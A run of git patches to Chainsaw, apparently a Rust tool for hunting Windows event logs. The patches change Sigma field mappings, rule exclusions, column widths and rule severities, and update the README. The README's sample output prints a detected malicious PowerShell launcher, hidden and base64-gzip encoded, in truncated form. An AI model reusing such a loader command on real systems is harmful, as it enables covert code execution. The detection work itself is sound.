Event.EventData.TicketEncryptionType + visible: false + - from: TicketOptions + to: Event.EventData.TicketOptions + visible: false + - from: Type + to: Event.EventData.Type + visible: false + - from: User + to: Event.EventData.User + visible: false + - from: UserName + to: Event.EventData.UserName + visible: false + - from: Value + to: Event.EventData.Value + visible: false + - from: Workstation + to: Event.EventData.Workstation + visible: false + - from: WorkstationName + to: Event.EventData.WorkstationName + visible: false + - from: param1 + to: Event.EventData.param1 + visible: false + - from: param2 + to: Event.EventData.param2 + visible: false + - from: processPath + to: Event.EventData.processPath + visible: false + - from: sha1 + to: Event.EventData.sha1 + visible: false From 4f92fd449772110147f15d7dbdb52c4d8a1a3ff0 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Thu, 7 Jul 2022 13:21:33 +0100 Subject: [PATCH 64/77] fix: swap some mappings to system --- mappings/sigma-event-logs-all.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/mappings/sigma-event-logs-all.yml b/mappings/sigma-event-logs-all.yml index 2311274a..cb072be3 100644 --- a/mappings/sigma-event-logs-all.yml +++ b/mappings/sigma-event-logs-all.yml @@ -76,7 +76,7 @@ groups: to: Event.EventData.CertThumbprint visible: false - from: Channel - to: Event.EventData.Channel + to: Event.System.Channel visible: false - from: ClassName to: Event.EventData.ClassName @@ -196,13 +196,13 @@ groups: to: Event.EventData.KeyLength visible: false - from: Keywords - to: Event.EventData.Keywords + to: Event.System.Keywords visible: false - from: LayerRTID to: Event.EventData.LayerRTID visible: false - from: Level - to: Event.EventData.Level + to: Event.System.Level visible: false - from: LocalName to: Event.EventData.LocalName From 61544f96e3cb33082a0ccaa28130939d16135f2c Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Thu, 7 Jul 2022 13:32:31 +0100 Subject: [PATCH 65/77] chore: fix clippy warnings --- src/cli.rs | 6 +++--- src/hunt.rs | 37 +++++++++++++++++-------------------- src/rule/chainsaw.rs | 3 +-- src/rule/mod.rs | 8 ++++---- src/rule/sigma.rs | 22 ++++++++++------------ 5 files changed, 35 insertions(+), 41 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index dc88a06e..d6f4f5f1 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -274,7 +274,7 @@ pub fn print_detections( (*hits).push(Hit { hunt, rule }); } for ((group, timestamp), mut hits) in hits { - hits.sort_by(|x, y| x.rule.name().cmp(&y.rule.name())); + hits.sort_by(|x, y| x.rule.name().cmp(y.rule.name())); let groups = groups.entry(group).or_insert(vec![]); (*groups).push(Grouping { kind: &detection.kind, @@ -446,7 +446,7 @@ pub fn print_detections( } else { cells.push(cell!(rules .iter() - .map(|rule| format!("{} {}", RULE_PREFIX, split_tag(&rule.name()))) + .map(|rule| format!("{} {}", RULE_PREFIX, split_tag(rule.name()))) .collect::>() .join("\n"))); } @@ -510,7 +510,7 @@ pub fn print_csv( (*hits).push(Hit { hunt, rule }); } for ((group, timestamp), mut hits) in hits { - hits.sort_by(|x, y| x.rule.name().cmp(&y.rule.name())); + hits.sort_by(|x, y| x.rule.name().cmp(y.rule.name())); let groups = groups.entry(group).or_insert(vec![]); (*groups).push(Grouping { kind: &detection.kind, diff --git a/src/hunt.rs b/src/hunt.rs index d3a47d66..4ec1101f 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -90,28 +90,25 @@ impl HunterBuilder { let mut hunts = vec![]; let rules = match self.rules { Some(mut rules) => { - rules.sort_by(|x, y| x.name().cmp(&y.name())); + rules.sort_by(|x, y| x.name().cmp(y.name())); let mut map = BTreeMap::new(); for rule in rules { let uuid = Uuid::new_v4(); - match &rule { - Rule::Chainsaw(rule) => { - let mapper = Mapper::from(rule.fields.clone()); - hunts.push(Hunt { - id: uuid, - - group: rule.group.clone(), - kind: HuntKind::Rule { - aggregate: rule.aggregate.clone(), - filter: rule.filter.clone(), - }, - timestamp: rule.timestamp.clone(), - - file: rule.kind.clone(), - mapper, - }); - } - _ => {} + if let Rule::Chainsaw(rule) = &rule { + let mapper = Mapper::from(rule.fields.clone()); + hunts.push(Hunt { + id: uuid, + + group: rule.group.clone(), + kind: HuntKind::Rule { + aggregate: rule.aggregate.clone(), + filter: rule.filter.clone(), + }, + timestamp: rule.timestamp.clone(), + + file: rule.kind.clone(), + mapper, + }); } map.insert(uuid, rule); } @@ -624,7 +621,7 @@ impl Hunter { pub fn extensions(&self) -> HashSet { let mut extensions = HashSet::new(); for rule in &self.inner.rules { - if let Some(e) = FileKind::extensions(&rule.1.types()) { + if let Some(e) = FileKind::extensions(rule.1.types()) { extensions.extend(e.iter().cloned()); } } diff --git a/src/rule/chainsaw.rs b/src/rule/chainsaw.rs index d1e93137..0c66f65d 100644 --- a/src/rule/chainsaw.rs +++ b/src/rule/chainsaw.rs @@ -155,8 +155,7 @@ pub fn load(rule: &Path) -> crate::Result { Filter::Expression(expression) => Filter::Expression({ let expression = optimiser::shake(expression); let expression = optimiser::rewrite(expression); - let expression = optimiser::matrix(expression); - expression + optimiser::matrix(expression) }), }; Ok(rule) diff --git a/src/rule/mod.rs b/src/rule/mod.rs index cdc0d52e..8ef8d219 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -234,7 +234,7 @@ pub fn load( } let sigma = match sigma::load(path)? .into_iter() - .map(|y| serde_yaml::from_value::(y)) + .map(serde_yaml::from_value::) .collect::, _>>() { Ok(rules) => rules, @@ -261,13 +261,13 @@ pub fn load( if let Some(levels) = levels.as_ref() { rules = rules .into_iter() - .filter(|r| levels.contains(&r.level())) + .filter(|r| levels.contains(r.level())) .collect(); } if let Some(statuses) = statuses.as_ref() { rules = rules .into_iter() - .filter(|r| statuses.contains(&r.status())) + .filter(|r| statuses.contains(r.status())) .collect(); } Ok(rules) @@ -292,7 +292,7 @@ pub fn lint(kind: &Kind, path: &Path) -> crate::Result> { Ok(yamls) => { let sigma = yamls .into_iter() - .map(|y| serde_yaml::from_value::(y)) + .map(serde_yaml::from_value::) .collect::, _>>()?; sigma .into_iter() diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index 21fa84fe..a7ef4ff1 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs @@ -289,7 +289,7 @@ fn prepare_condition(condition: &str) -> Result<(String, Option)> { // agg-function(agg-field) [ by group-field ] comparison-op value if let Some(kind) = parts.next() { if let Some(rest) = kind.strip_prefix("count(") { - if let Some(field) = rest.strip_suffix(")") { + if let Some(field) = rest.strip_suffix(')') { if !field.is_empty() { fields.push(field.to_owned()); } @@ -413,7 +413,7 @@ fn prepare( } } detection = Detection { - condition: Some(Yaml::String(condition.to_owned())), + condition: Some(Yaml::String(condition)), identifiers, } } @@ -451,8 +451,7 @@ fn detections_to_tau(detection: Detection) -> Result { match v { Yaml::Sequence(sequence) => { let mut blocks = vec![]; - let mut index = 0; - for entry in sequence { + for (index, entry) in sequence.into_iter().enumerate() { let mapping = match entry.as_mapping() { Some(mapping) => mapping, None => bail!("keyless identifiers cannot be converted"), @@ -475,7 +474,7 @@ fn detections_to_tau(detection: Detection) -> Result { if modifiers.contains("all") { f = format!("all({})", f); } - let v = parse_identifier(&v, &modifiers)?; + let v = parse_identifier(v, &modifiers)?; let f = f.into(); let mut map = Mapping::new(); map.insert(f, v); @@ -497,7 +496,6 @@ fn detections_to_tau(detection: Detection) -> Result { Yaml::Sequence(maps.into_iter().map(|m| m.into()).collect()), )); } - index += 1; } patches.insert( k, @@ -512,7 +510,7 @@ fn detections_to_tau(detection: Detection) -> Result { ), ); for (k, v) in blocks { - det.insert(k.into(), v.into()); + det.insert(k.into(), v); } } Yaml::Mapping(mapping) => { @@ -569,7 +567,7 @@ fn detections_to_tau(detection: Detection) -> Result { .replace(" OR ", " or ") .split_whitespace() .map(|ident| { - let key = ident.trim_start_matches("(").trim_end_matches(")"); + let key = ident.trim_start_matches('(').trim_end_matches(')'); match patches.get(key) { Some(v) => ident.replace(key, v), None => ident.to_owned(), @@ -603,7 +601,7 @@ fn detections_to_tau(detection: Detection) -> Result { let mut parts = condition.split_whitespace(); while let Some(part) = parts.next() { let mut token = part; - while let Some(tail) = token.strip_prefix("(") { + while let Some(tail) = token.strip_prefix('(') { mutated.push("(".to_owned()); token = tail; } @@ -619,11 +617,11 @@ fn detections_to_tau(detection: Detection) -> Result { if let Some(next) = parts.next() { let mut brackets = vec![]; let mut identifier = next; - while let Some(head) = identifier.strip_suffix(")") { + while let Some(head) = identifier.strip_suffix(')') { brackets.push(")".to_owned()); identifier = head; } - if let Some(ident) = identifier.strip_suffix("*") { + if let Some(ident) = identifier.strip_suffix('*') { let mut keys = vec![]; for (k, _) in &det { if let Yaml::String(key) = k { @@ -651,7 +649,7 @@ fn detections_to_tau(detection: Detection) -> Result { Some(i) => i, None => identifier, }; - let key = next.replace(identifier, &key); + let key = next.replace(identifier, key); if part == "all" { mutated.push(format!("all({})", key)); } else if part == "1" { From 8a32938c3bc0843fe6043088848649e9b4c9967c Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Thu, 7 Jul 2022 13:56:31 +0100 Subject: [PATCH 66/77] feat: allow tabular output to output complex data --- mappings/sigma-event-logs-all.yml | 3 +++ src/cli.rs | 41 ++++++++++++++++++++++++++++--- 2 files changed, 41 insertions(+), 3 deletions(-) diff --git a/mappings/sigma-event-logs-all.yml b/mappings/sigma-event-logs-all.yml index cb072be3..cedbe0fd 100644 --- a/mappings/sigma-event-logs-all.yml +++ b/mappings/sigma-event-logs-all.yml @@ -20,6 +20,9 @@ groups: - name: Computer from: Computer to: Event.System.Computer + - name: Event Data + from: EventData + to: Event.EventData - from: AccessList to: Event.EventData.AccessList diff --git a/src/cli.rs b/src/cli.rs index d6f4f5f1..8e37fff9 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -6,8 +6,9 @@ use chrono_tz::Tz; use indicatif::{ProgressBar, ProgressDrawTarget, ProgressStyle}; use prettytable::{cell, format, Row, Table}; use serde::Serialize; +use serde_json::{Map, Number, Value as Json}; use std::hash::{Hash, Hasher}; -use tau_engine::Document; +use tau_engine::{Document, Value as Tau}; use uuid::Uuid; use crate::file::Kind as FileKind; @@ -387,8 +388,15 @@ pub fn print_detections( ))); } None => { - "".hash(&mut hasher); - cells.push(cell!("")); + let yaml = serde_yaml::to_string(&to_json_truncated( + value, + column_width, + )) + .expect("could not get yaml"); + yaml.hash(&mut hasher); + cells.push(cell!(yaml)); + //"".hash(&mut hasher); + //cells.push(cell!("")); } } continue; @@ -758,3 +766,30 @@ pub fn print_json( cs_print_json!(&detections)?; Ok(()) } + +pub fn to_json_truncated(tau: Tau, width: u32) -> Json { + match tau { + Tau::Null => Json::Null, + Tau::Bool(b) => Json::Bool(b), + Tau::Float(f) => Json::Number(Number::from_f64(f).expect("could not set f64")), + Tau::Int(i) => Json::Number(Number::from(i)), + Tau::UInt(u) => Json::Number(Number::from(u)), + Tau::String(s) => { + let mut x = s.to_string(); + x.truncate(width as usize); + if x.len() != s.len() { + x = format!("{}...", x); + } + Json::String(x) + } + Tau::Array(a) => Json::Array(a.iter().map(|x| to_json_truncated(x, width)).collect()), + Tau::Object(o) => { + let mut map = Map::new(); + for k in o.keys() { + let v = o.get(&k).expect("could not get value"); + map.insert(k.to_string(), to_json_truncated(v, width)); + } + Json::Object(map) + } + } +} From 8fa32c429725d93b8b36c73098f8ca379a4ccdd4 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Thu, 7 Jul 2022 14:30:37 +0100 Subject: [PATCH 67/77] fix: rename ignore to exclusions in mapping --- mappings/sigma-event-logs-all.yml | 10 +++++++++- mappings/sigma-event-logs.yml | 2 +- 2 files changed, 10 insertions(+), 2 deletions(-) diff --git a/mappings/sigma-event-logs-all.yml b/mappings/sigma-event-logs-all.yml index cedbe0fd..2e33e84d 100644 --- a/mappings/sigma-event-logs-all.yml +++ b/mappings/sigma-event-logs-all.yml @@ -3,6 +3,14 @@ name: Chainsaw's groupless Sigma mappings for Event Logs kind: evtx rules: sigma +exclusions: +- Defense evasion via process reimaging +- Exports Registry Key To an Alternate Data Stream +- NetNTLM Downgrade Attack +- Non Interactive PowerShell +- Wuauclt Network Connection +- Raw Disk Access From Illegitimate Tools + groups: - name: Sigma timestamp: Event.System.TimeCreated @@ -21,7 +29,7 @@ groups: from: Computer to: Event.System.Computer - name: Event Data - from: EventData + from: EventData to: Event.EventData - from: AccessList diff --git a/mappings/sigma-event-logs.yml b/mappings/sigma-event-logs.yml index 2cf419bd..bbb410d3 100644 --- a/mappings/sigma-event-logs.yml +++ b/mappings/sigma-event-logs.yml @@ -3,7 +3,7 @@ name: Chainsaw's Sigma mappings for Event Logs kind: evtx rules: sigma -ignore: +exclusions: - Defense evasion via process reimaging - Exports Registry Key To an Alternate Data Stream - NetNTLM Downgrade Attack From 5d3e998eebee437879c4c71280f9a7c02fa8d657 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Thu, 7 Jul 2022 19:17:50 +0100 Subject: [PATCH 68/77] chore: format field outputs for global mapping files --- mappings/sigma-event-logs-all.yml | 4 ++- src/cli.rs | 52 +++++++++++++++---------------- 2 files changed, 28 insertions(+), 28 deletions(-) diff --git a/mappings/sigma-event-logs-all.yml b/mappings/sigma-event-logs-all.yml index 2e33e84d..82619530 100644 --- a/mappings/sigma-event-logs-all.yml +++ b/mappings/sigma-event-logs-all.yml @@ -9,7 +9,9 @@ exclusions: - NetNTLM Downgrade Attack - Non Interactive PowerShell - Wuauclt Network Connection -- Raw Disk Access From Illegitimate Tools +- Raw Disk Access Using Illegitimate Tools +- Executable in ADS +- Space After Filename - macOS groups: - name: Sigma diff --git a/src/cli.rs b/src/cli.rs index 8e37fff9..a86a836b 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -48,29 +48,29 @@ pub fn init_progress_bar(size: u64, msg: String) -> indicatif::ProgressBar { pb } -pub fn format_field_length(data: &str, full_output: bool, length: u32) -> String { +pub fn format_field_length(data: &str, full_output: bool, col_width: u32) -> String { // Take the context_field and format it for printing. Remove newlines, break into even chunks etc. // If this is a scheduled task we need to parse the XML to make it more readable - let mut data = data + let mut scratch = data .replace('\n', "") .replace('\r', "") .replace('\t', "") .replace(" ", " ") .chars() .collect::>() - .chunks(length as usize) + .chunks(col_width as usize) .map(|c| c.iter().collect::()) .collect::>() .join("\n"); - let truncate_len = 1000; + let truncate_len = 500; - if !full_output && data.len() > truncate_len { - data.truncate(truncate_len); - data.push_str("...\n\n(use --full to show all content)"); + if !full_output && scratch.len() > truncate_len { + scratch.truncate(truncate_len); + scratch.push_str("...\n(use --full to show all content)"); } - data + scratch } fn split_tag(tag_name: &str) -> String { @@ -384,19 +384,24 @@ pub fn print_detections( cells.push(cell!(format_field_length( &v, full, - column_width + column_width, ))); } None => { - let yaml = serde_yaml::to_string(&to_json_truncated( - value, - column_width, - )) - .expect("could not get yaml"); + let mut yaml = + serde_yaml::to_string(&tau_to_json(value)) + .expect("could not get yaml"); + + yaml = yaml + .split('\n') + .collect::>() + .iter() + .map(|x| format_field_length(x, full, column_width)) + .collect::>() + .join("\n") + .replace("\\n", "\n"); yaml.hash(&mut hasher); cells.push(cell!(yaml)); - //"".hash(&mut hasher); - //cells.push(cell!("")); } } continue; @@ -767,27 +772,20 @@ pub fn print_json( Ok(()) } -pub fn to_json_truncated(tau: Tau, width: u32) -> Json { +pub fn tau_to_json(tau: Tau) -> Json { match tau { Tau::Null => Json::Null, Tau::Bool(b) => Json::Bool(b), Tau::Float(f) => Json::Number(Number::from_f64(f).expect("could not set f64")), Tau::Int(i) => Json::Number(Number::from(i)), Tau::UInt(u) => Json::Number(Number::from(u)), - Tau::String(s) => { - let mut x = s.to_string(); - x.truncate(width as usize); - if x.len() != s.len() { - x = format!("{}...", x); - } - Json::String(x) - } - Tau::Array(a) => Json::Array(a.iter().map(|x| to_json_truncated(x, width)).collect()), + Tau::String(s) => Json::String(s.to_string()), + Tau::Array(a) => Json::Array(a.iter().map(tau_to_json).collect()), Tau::Object(o) => { let mut map = Map::new(); for k in o.keys() { let v = o.get(&k).expect("could not get value"); - map.insert(k.to_string(), to_json_truncated(v, width)); + map.insert(k.to_string(), tau_to_json(v)); } Json::Object(map) } From b53795667a0ee329bd09febc8a6668a674c0405c Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Thu, 7 Jul 2022 22:28:25 +0100 Subject: [PATCH 69/77] feat: auto adjust column width based on terminal size --- Cargo.lock | 11 +++++++++++ Cargo.toml | 1 + src/main.rs | 22 +++++++++++++++++++++- 3 files changed, 33 insertions(+), 1 deletion(-) diff --git a/Cargo.lock b/Cargo.lock index a5754deb..cce62266 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -183,6 +183,7 @@ dependencies = [ "serde_yaml", "structopt", "tau-engine", + "term_size", "uuid", ] @@ -1231,6 +1232,16 @@ dependencies = [ "winapi", ] +[[package]] +name = "term_size" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1e4129646ca0ed8f45d09b929036bafad5377103edd06e50bf574b353d2b08d9" +dependencies = [ + "libc", + "winapi", +] + [[package]] name = "termcolor" version = "1.1.3" diff --git a/Cargo.toml b/Cargo.toml index ee1e2088..e9d3c540 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -28,6 +28,7 @@ serde_json = "1.0" serde_yaml = "0.8" structopt = "0.3" tau-engine = { version = "1.0", features = ["core", "json"] } +term_size = "0.3" uuid = { version = "1.1", features = ["serde", "v4"] } diff --git a/src/main.rs b/src/main.rs index 6c093b44..07d7d81f 100644 --- a/src/main.rs +++ b/src/main.rs @@ -1,5 +1,6 @@ #[macro_use] extern crate chainsaw; +extern crate term_size; use std::collections::HashSet; use std::fs::File; @@ -201,6 +202,22 @@ fn print_title() { ); } +fn resolve_col_width() -> Option { + // Get windows size and return a rough mapping for sutiable col width + match term_size::dimensions() { + Some((w, _h)) => match w { + 50..=120 => Some(30), + 121..=239 => Some(40), + 240..=340 => Some(70), + 341..=430 => Some(110), + 431..=550 => Some(150), + 551.. => Some(180), + _ => None, + }, + None => None, + } +} + fn init_writer(output: Option, csv: bool, json: bool, quiet: bool) -> crate::Result<()> { let (path, output) = match &output { Some(path) => { @@ -250,7 +267,7 @@ fn run() -> Result<()> { rule, load_unknown, - column_width, + mut column_width, csv, extension, from, @@ -269,6 +286,9 @@ fn run() -> Result<()> { timezone, to, } => { + if column_width.is_none() { + column_width = resolve_col_width(); + } init_writer(output, csv, json, quiet)?; if !opts.no_banner { print_title(); From 0c76b48ec1def895c471a6410a7da44cde1b5b7b Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Thu, 7 Jul 2022 22:30:01 +0100 Subject: [PATCH 70/77] chore: exclude noisy rules via mapping file --- mappings/sigma-event-logs-all.yml | 4 ++++ mappings/sigma-event-logs.yml | 8 ++++++++ 2 files changed, 12 insertions(+) diff --git a/mappings/sigma-event-logs-all.yml b/mappings/sigma-event-logs-all.yml index 82619530..d4dec164 100644 --- a/mappings/sigma-event-logs-all.yml +++ b/mappings/sigma-event-logs-all.yml @@ -12,6 +12,10 @@ exclusions: - Raw Disk Access Using Illegitimate Tools - Executable in ADS - Space After Filename - macOS +- Execution Of Non-Existing File +- Execution of Suspicious File Type Extension +- Execution from Suspicious Folder +- Process Start From Suspicious Folder groups: - name: Sigma diff --git a/mappings/sigma-event-logs.yml b/mappings/sigma-event-logs.yml index bbb410d3..9030a02c 100644 --- a/mappings/sigma-event-logs.yml +++ b/mappings/sigma-event-logs.yml @@ -9,6 +9,14 @@ exclusions: - NetNTLM Downgrade Attack - Non Interactive PowerShell - Wuauclt Network Connection + - Raw Disk Access Using Illegitimate Tools + - Executable in ADS + - Space After Filename - macOS + - Execution Of Non-Existing File + - Execution of Suspicious File Type Extension + - Execution from Suspicious Folder + - Process Start From Suspicious Folder + groups: - name: Suspicious Process Creation From 67b4e582d3090774a8a1e19e03cf327376580efd Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Thu, 7 Jul 2022 23:55:58 +0100 Subject: [PATCH 71/77] feat: adding event data to csv output --- src/cli.rs | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index a86a836b..57e0140b 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -628,8 +628,10 @@ pub fn print_csv( cells.push(v); } None => { - "".hash(&mut hasher); - cells.push("".to_owned()); + let yaml = serde_yaml::to_string(&tau_to_json(value)) + .expect("could not get yaml"); + yaml.hash(&mut hasher); + cells.push(yaml); } } continue; From b8f551171553f69987c5339d9afba90ffd9dd90e Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Fri, 8 Jul 2022 00:13:36 +0100 Subject: [PATCH 72/77] chore: adjust default column width --- src/main.rs | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/src/main.rs b/src/main.rs index 07d7d81f..37dad063 100644 --- a/src/main.rs +++ b/src/main.rs @@ -206,12 +206,12 @@ fn resolve_col_width() -> Option { // Get windows size and return a rough mapping for sutiable col width match term_size::dimensions() { Some((w, _h)) => match w { - 50..=120 => Some(30), - 121..=239 => Some(40), - 240..=340 => Some(70), - 341..=430 => Some(110), - 431..=550 => Some(150), - 551.. => Some(180), + 50..=120 => Some(20), + 121..=239 => Some(30), + 240..=340 => Some(50), + 341..=430 => Some(90), + 431..=550 => Some(130), + 551.. => Some(160), _ => None, }, None => None, From 2737eef4593658ebcebc385b2dded7317588b477 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 11 Jul 2022 22:05:29 +0100 Subject: [PATCH 73/77] chore: update severity levels for chainsaw rules --- rules/antivirus/f-secure.yml | 2 +- rules/antivirus/kaspersky.yml | 2 +- rules/antivirus/sophos.yml | 2 +- rules/antivirus/windows_defender.yml | 2 +- rules/log_tampering/security_audit_log_was_cleared.yml | 2 +- rules/log_tampering/system_log_was_cleared.yml | 2 +- rules/service_tampering/event_log.yml | 2 +- 7 files changed, 7 insertions(+), 7 deletions(-) diff --git a/rules/antivirus/f-secure.yml b/rules/antivirus/f-secure.yml index 20fde701..42ac3bc8 100644 --- a/rules/antivirus/f-secure.yml +++ b/rules/antivirus/f-secure.yml @@ -7,7 +7,7 @@ authors: kind: evtx -level: info +level: critical status: stable timestamp: Event.System.TimeCreated diff --git a/rules/antivirus/kaspersky.yml b/rules/antivirus/kaspersky.yml index e466e989..aa07f298 100644 --- a/rules/antivirus/kaspersky.yml +++ b/rules/antivirus/kaspersky.yml @@ -7,7 +7,7 @@ authors: kind: evtx -level: info +level: critical status: stable timestamp: Event.System.TimeCreated diff --git a/rules/antivirus/sophos.yml b/rules/antivirus/sophos.yml index db54ef2a..868208bb 100644 --- a/rules/antivirus/sophos.yml +++ b/rules/antivirus/sophos.yml @@ -7,7 +7,7 @@ authors: kind: evtx -level: info +level: critical status: stable timestamp: Event.System.TimeCreated diff --git a/rules/antivirus/windows_defender.yml b/rules/antivirus/windows_defender.yml index b5931982..087361f6 100644 --- a/rules/antivirus/windows_defender.yml +++ b/rules/antivirus/windows_defender.yml @@ -7,7 +7,7 @@ authors: kind: evtx -level: info +level: critical status: stable timestamp: Event.System.TimeCreated diff --git a/rules/log_tampering/security_audit_log_was_cleared.yml b/rules/log_tampering/security_audit_log_was_cleared.yml index bd010f2f..f36ff851 100644 --- a/rules/log_tampering/security_audit_log_was_cleared.yml +++ b/rules/log_tampering/security_audit_log_was_cleared.yml @@ -7,7 +7,7 @@ authors: kind: evtx -level: info +level: critical status: stable timestamp: Event.System.TimeCreated diff --git a/rules/log_tampering/system_log_was_cleared.yml b/rules/log_tampering/system_log_was_cleared.yml index a3a6ad6c..3716597a 100644 --- a/rules/log_tampering/system_log_was_cleared.yml +++ b/rules/log_tampering/system_log_was_cleared.yml @@ -7,7 +7,7 @@ authors: kind: evtx -level: info +level: high status: stable timestamp: Event.System.TimeCreated diff --git a/rules/service_tampering/event_log.yml b/rules/service_tampering/event_log.yml index 54c9414c..4a0d0f90 100644 --- a/rules/service_tampering/event_log.yml +++ b/rules/service_tampering/event_log.yml @@ -7,7 +7,7 @@ authors: kind: evtx -level: info +level: critical status: stable timestamp: Event.System.TimeCreated From 97f7f1c79a66042cf194850d786331137d365495 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 11 Jul 2022 22:26:02 +0100 Subject: [PATCH 74/77] chore: rename mapping file --- mappings/{sigma-event-logs.yml => sigma-event-logs-legacy.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename mappings/{sigma-event-logs.yml => sigma-event-logs-legacy.yml} (100%) diff --git a/mappings/sigma-event-logs.yml b/mappings/sigma-event-logs-legacy.yml similarity index 100% rename from mappings/sigma-event-logs.yml rename to mappings/sigma-event-logs-legacy.yml From 089c5036f5eecc7494d7134d038d58d0dedbeaab Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 11 Jul 2022 22:34:49 +0100 Subject: [PATCH 75/77] docs: update readme for beta release --- README.md | 184 +++++++++++++++++++++++++++++++++++------------------- 1 file changed, 121 insertions(+), 63 deletions(-) diff --git a/README.md b/README.md index eadefddc..4b1ebe86 100644 --- a/README.md +++ b/README.md @@ -20,7 +20,7 @@ Chainsaw provides a powerful ‘first-response’ capability to quickly identify - :bookmark_tabs: Output results in a variety of formats, such as ASCII table format, CSV format, and JSON format - :computer: Can be run on MacOS, Linux and Windows --- - $ ./chainsaw hunt evtx_attack_samples -s sigma_rules --mapping mappings/sigma-event-logs.yml --level critical + $ ./chainsaw hunt rules/ evtx_attack_samples -s sigma/rules --mapping mappings/sigma-event-logs-all.yml --level critical ██████╗██╗ ██╗ █████╗ ██╗███╗ ██╗███████╗ █████╗ ██╗ ██╗ ██╔════╝██║ ██║██╔══██╗██║████╗ ██║██╔════╝██╔══██╗██║ ██║ @@ -30,66 +30,104 @@ Chainsaw provides a powerful ‘first-response’ capability to quickly identify ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝ ╚══╝╚══╝ By F-Secure Countercept (@FranticTyping, @AlexKornitzer) - [+] Loading detection rules from: sigma_rules - [+] Loaded 169 detection rules (338 not loaded) - [+] Loading event logs from: evtx_attack_samples (extensions: .evtx) + [+] Loading detection rules from: ../../rules/, /tmp/sigma/rules + [+] Loaded 129 detection rules (198 not loaded) + [+] Loading event logs from: ../../evtx_attack_samples (extensions: .evtx) [+] Loaded 268 EVTX files (37.5 MB) [+] Hunting: [========================================] 268/268 - [+] Group: Suspicious File Creation - ┌─────────────────────┬───────────────────────────────┬───────┬──────────────────────────┬──────────────────────────────────────────┬──────────────────────────────────────────┐ - │ timestamp │ detections │ count │ Computer │ Image │ Target File Name │ - ├─────────────────────┼───────────────────────────────┼───────┼──────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ - │ 2019-06-21 07:35:37 │ ‣ Dumpert Process Dumper │ 1 │ alice.insecurebank.local │ C:\Users\administrator\Desktop\x64\Outfl │ C:\Windows\Temp\dumpert.dmp │ - │ │ │ │ │ ank-Dumpert.exe │ │ - ├─────────────────────┼───────────────────────────────┼───────┼──────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ - │ 2020-08-12 13:04:27 │ ‣ CVE-2021-1675 Print Spooler │ 1 │ MSEDGEWIN10 │ C:\Windows\System32\spoolsv.exe │ C:\Windows\System32\spool\drivers\x64\3\ │ - │ │ Exploitation Filename │ │ │ │ New\STDSCHMX.GDL │ - │ │ Pattern │ │ │ │ │ - └─────────────────────┴───────────────────────────────┴───────┴──────────────────────────┴──────────────────────────────────────────┴──────────────────────────────────────────┘ - - [+] Group: Suspicious Process Creation - ┌─────────────────────┬───────────────────────────────┬───────┬─────────────┬──────────────────────────────────────────┬──────────────────────────────────────────┬──────────────────────────────────────────┐ - │ timestamp │ detections │ count │ Computer │ Image │ Command Line │ Parent Command Line │ - ├─────────────────────┼───────────────────────────────┼───────┼─────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ - │ 2019-04-30 20:26:52 │ ‣ Encoded FromBase64String │ 1 │ IEWIN7 │ C:\Windows\System32\WindowsPowerShell\v1 │ powershell.exe -nop -w hidden -noni -c " │ C:\Windows\system32\cmd.exe /b /c start │ - │ │ │ │ │ .0\powershell.exe │ if([IntPtr]::Size -eq 4){$b='powershell. │ /b /min powershell.exe -nop -w hidden -n │ - │ │ │ │ │ │ exe'}else{$b=$env:windir+'\syswow64\Wind │ oni -c "if([IntPtr]::Size -eq 4){$b='pow │ - │ │ │ │ │ │ owsPowerShell\v1.0\powershell.exe'};$s=N │ ershell.exe'}else{$b=$env:windir+'\syswo │ - │ │ │ │ │ │ ew-Object System.Diagnostics.ProcessStar │ w64\WindowsPowerShell\v1.0\powershell.ex │ - │ │ │ │ │ │ tInfo;$s.FileName=$b;$s.Arguments='-noni │ e'};$s=New-Object System.Diagnostics.Pro │ - │ │ │ │ │ │ -nop -w hidden -c &([scriptblock]::crea │ cessStartInfo;$s.FileName=$b;$s.Argument │ - │ │ │ │ │ │ IO.MemoryStream(,[Convert]::FromBase64St │ ew-Object IO.Compression.GzipStream((New │ - │ │ │ │ │ │ ring(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVE │ -Object IO.MemoryStream(,[Convert]::From │ - │ │ │ │ │ │ rZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/ │ Base64String(''H4sIAIuvyFwCA7VW+2/aSBD+O │ - │ │ │ │ │ │ u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2Dx │ ZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0la │ - │ │ │ │ │ │ Crl3Gbhx9ZapgqKf... │ yP6kiEwOpsexgQCk... 